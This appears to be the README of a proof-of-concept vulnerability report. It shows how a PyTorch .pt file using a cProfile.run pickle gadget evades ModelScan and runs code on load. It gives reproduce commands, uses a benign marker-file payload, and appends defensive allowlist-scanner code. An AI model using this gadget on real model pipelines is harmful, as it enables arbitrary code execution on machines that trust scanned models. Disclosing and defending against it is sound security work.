ModelScan Bypass: Arbitrary Code Execution in PyTorch .pt via cProfile.run gadget
Proof-of-concept for a Huntr Model File Format report.
model.pt runs code on torch.load(..., weights_only=False) while ModelScan reports it clean.
The malicious __reduce__ uses cProfile.run, a code-executing stdlib callable that is
not on ModelScan's PickleUnsafeOpScan denylist, and hides the command in a string
argument the scanner never inspects.
Files
- model.pt: the PoC model file (benign payload: writes pytorch_poc_executed.txt)
- exploit.py: builds the model, scans it with ModelScan, loads it, prints the result
- README.md: this file
Reproduce
pip install torch modelscan
# 1) scanner says it is safe:
modelscan -p model.pt # -> No issues found!
# 2) loading with weights_only=False executes code:
python -c "import torch; torch.load('model.pt', weights_only=False)"
ls pytorch_poc_executed.txt # marker proves code ran on load
# or run everything at once:
python exploit.py # -> No issues found (BYPASS) + CODE EXECUTED
Impact
ModelScan is used to gate untrusted models in MLOps pipelines / model registries. This file passes the scan as clean yet achieves arbitrary code execution on load, defeating the control. Verified on PyTorch 2.6 / modelscan 0.8.6.
The vulnerability affects torch.load(weights_only=False), which is common in legacy code and when
loading checkpoints. Modern PyTorch (2.6+) defaults to weights_only=True (safe), but many
production systems haven't upgraded or explicitly use weights_only=False.
The payload here is benign (writes a marker file). Swap the command in exploit.py to confirm
real command execution.
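A denylist such as PickleUnsafeOpScan misses any code-executing callable it does not enumerate; the inverse check, rejecting every global the pickle stream imports unless it is on a short allowlist (the approach weights_only=True takes), catches cProfile.run without ever having heard of it. The following is an added example and not part of this repository: the allowlist is an assumed illustrative subset of what a real checkpoint needs, sample_streams builds reference-only pickles in memory (nothing is executed), and STACK_GLOBAL operands are assumed to be literal strings.

```python
import cProfile
import pickle
import pickletools
import zipfile
from collections import OrderedDict

# Illustrative allowlist (assumed subset): globals a plain tensor checkpoint needs.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
    ("torch._utils", "_rebuild_tensor_v2"),
    ("torch", "FloatStorage"),
}
STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE",
              "STRING", "SHORT_BINSTRING", "BINSTRING"}


def imported_globals(data: bytes) -> list[tuple[str, str]]:
    """List every (module, name) the stream would import, without unpickling it."""
    found, recent = [], []  # recent = string constants pushed so far
    for op, arg, _pos in pickletools.genops(data):
        if op.name in STRING_OPS:
            recent.append(arg)
        elif op.name in ("GLOBAL", "INST"):  # protocol <4: "module name" inline
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL":  # protocol 4+: operands come from the stack
            # Assumes both operands were pushed as literals just before (what
            # pickle.dumps emits); memo references (BINGET) are not resolved.
            found.append(tuple(recent[-2:]) if len(recent) >= 2 else ("?", "?"))
    return found


def disallowed_globals(data: bytes) -> list[tuple[str, str]]:
    """Anything outside the allowlist is a reason to reject the file."""
    return [g for g in imported_globals(data) if g not in ALLOWED_GLOBALS]


def scan_pt(path: str) -> list[tuple[str, str]]:
    """A .pt checkpoint is a zip; the pickled object graph is <archive>/data.pkl."""
    with zipfile.ZipFile(path) as zf:
        pkl = next(n for n in zf.namelist() if n.endswith("data.pkl"))
        return disallowed_globals(zf.read(pkl))


def sample_streams() -> dict[str, bytes]:
    """Constructed test inputs: function/class references only, nothing is executed."""
    return {
        "plain_dict": pickle.dumps({"a": 1}, protocol=4),
        "ordered_dict": pickle.dumps(OrderedDict(), protocol=4),
        "cprofile_ref": pickle.dumps(cProfile.run, protocol=4),  # the gadget above
    }
```

Running scan_pt over a real checkpoint requires extending ALLOWED_GLOBALS to the full set of torch rebuild helpers and storage classes the model uses; any unexpected entry, including ("cProfile", "run"), is a rejection.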